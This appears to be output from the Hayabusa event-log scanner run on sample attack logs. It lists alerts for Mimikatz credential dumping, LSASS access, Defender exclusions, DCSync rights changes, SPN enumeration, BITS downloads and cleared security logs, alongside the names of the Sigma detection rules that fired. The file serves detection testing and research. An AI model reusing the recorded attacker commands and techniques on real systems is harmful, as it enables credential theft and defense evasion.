C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 
+09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify 
tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: 
LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.296 
+09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual 
Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx -2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx -2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx -2021-02-23 07:18:08.605 
+09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx -2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:49:23.184 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:52.751 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash 